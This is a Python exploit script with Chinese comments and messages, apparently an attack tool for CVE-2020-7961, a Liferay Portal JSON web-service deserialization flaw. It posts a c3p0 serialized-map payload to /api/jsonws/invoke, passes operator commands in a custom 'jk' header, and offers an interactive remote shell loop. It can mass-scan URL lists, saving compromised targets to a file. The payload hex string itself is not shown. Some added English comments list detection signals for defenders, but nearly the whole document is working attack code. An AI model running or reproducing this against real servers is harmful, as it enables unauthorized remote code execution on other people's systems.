Liferay_CVE-2020-7961_Exploit_v4.py
# 作者: VulnExpo
# 日期: 2023-10-9
import sys
import argparse
import requests
import time
import json
import re
from urllib.parse import urlparse
import random
# Silence urllib3's warnings process-wide. This hides the InsecureRequestWarning
# that would otherwise be printed for the verify=False request made further down.
requests.packages.urllib3.disable_warnings()
def check_for_vulnerability(url, cmd, interactive=False, proxies={}, success_file=None):
    """Send one CVE-2020-7961 request to ``url`` and return the text it echoes back.

    Args:
        url: Base URL of the Liferay instance; ``/api/jsonws/invoke`` is appended.
        cmd: String sent in the custom ``jk`` request header.
        interactive: When true and the first request matched, prompt on stdin
            for further strings and send each one in a new request.
        proxies: Accepted and forwarded on recursion, but never handed to
            ``requests.post`` here, so it has no effect on the traffic.
        success_file: Path opened in append mode whenever a response matches.
            With the default ``None`` the ``open`` call raises ``TypeError``,
            which the broad ``except`` below turns into a printed message.

    Returns:
        The stripped text found between the ``~~~`` markers in the response,
        or ``None`` when there is no match or any exception occurred.
    """
    try:
        # NOTE(review): the payload assignment is elided in this copy of the file.
        # From its use below it is a hex string placed after "HexAsciiSerializedMap:".
        payload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
        # Form body for the JSON web-service invoker. For defenders, the literal
        # strings here are what shows up in request bodies and WAF logs: the
        # /expandocolumn/update-column call, the typed parameter name
        # "defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", and
        # "userOverridesAsString" carrying "HexAsciiSerializedMap:".
        post_data = (
            'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}'
        )
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            # Fixed, dated browser User-Agent string.
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
            # Non-standard header carrying the caller-supplied string; an unusual
            # "jk" header on a POST to /api/jsonws/invoke is a usable log signal.
            "jk": cmd
        }
        api_url = '{url}/api/jsonws/invoke'.format(url=url)
        # TLS verification is off, redirects are not followed, 60 s timeout.
        resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False)
        # Output is expected wrapped in "~~~" markers; re.S lets it span lines.
        pattern = '~~~(.*?)~~~'
        match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I)
        if match:
            result = match.group(1)
            result = result.strip()
            # Append a record (target URL, header value, response text) to the
            # results file; this file is an artifact left on the operator's host.
            with open(success_file, 'a') as s_file:
                s_file.write(f"++++++++++++++++++\n")
                s_file.write(f"目标URL: {url}\n")
                s_file.write(f"Payload: {cmd}\n")
                s_file.write(f"响应内容:\n{result}\n\n")
            if interactive:
                print(f"目标URL: {url}")
                print(f"Payload: {cmd}")
                print(f"响应内容:\n{result}\n")
                # Prompt loop: each line typed is sent as a fresh request via a
                # recursive call with interactive=False; the literal "exit" is
                # compared before stripping, so it must be typed without padding.
                while True:
                    user_input = input("请输入要执行的命令或输入'exit'退出: ")
                    if user_input == 'exit':
                        break
                    interactive_cmd = user_input.strip()
                    interactive_result = check_for_vulnerability(url, interactive_cmd, False, proxies, success_file)
                    if interactive_result:
                        print(f"响应内容:\n{interactive_result}\n")
            return result  # return the result string
    except Exception as e:
        # Any failure (network error, decode error, bad success_file) is only
        # printed; the caller cannot tell it apart from "no match".
        print(f"发生异常:{e}")
        return None
def scan_targets(targets, cmd, interactive=False, proxies={}, success_file=None):
    """Call check_for_vulnerability once for every entry in ``targets``.

    Each entry has surrounding whitespace stripped first; the remaining
    arguments are passed through unchanged. Return values of the individual
    checks are discarded, so this function always returns ``None``.
    """
    cleaned = (entry.strip() for entry in targets)
    for base_url in cleaned:
        check_for_vulnerability(base_url, cmd, interactive, proxies, success_file)
if __name__ == '__main__':
    # Command-line entry point: collect target URLs from -u or a list file and
    # run scan_targets over each of them.
    parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞CVE-2020-7961")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
    parser.add_argument("-c", "--cmd", help="要执行的命令")
    parser.add_argument("-i", "--interactive", action="store_true", help="启用交互式Shell模式")
    args = parser.parse_args()

    # --file defaults to url.txt, so this guard only fires when -f is given an
    # empty value and -u is absent.
    if not (args.url or args.file):
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)

    # A single -u target takes precedence over the list file.
    if args.url:
        urls = [args.url]
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.readlines()

    # proxies is always empty here. Results go to a fixed file name relative to
    # the working directory, which is the artifact to look for where this ran.
    proxies = {}
    success_file = 'success_targets.txt'
    for url in urls:
        url = url.strip()
        if url.startswith("http://") or url.startswith("https://"):
            candidates = [url]
        else:
            # No scheme given: both http:// and https:// variants are tried.
            candidates = ["http://" + url, "https://" + url]
        scan_targets(candidates, args.cmd, args.interactive, proxies, success_file)
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")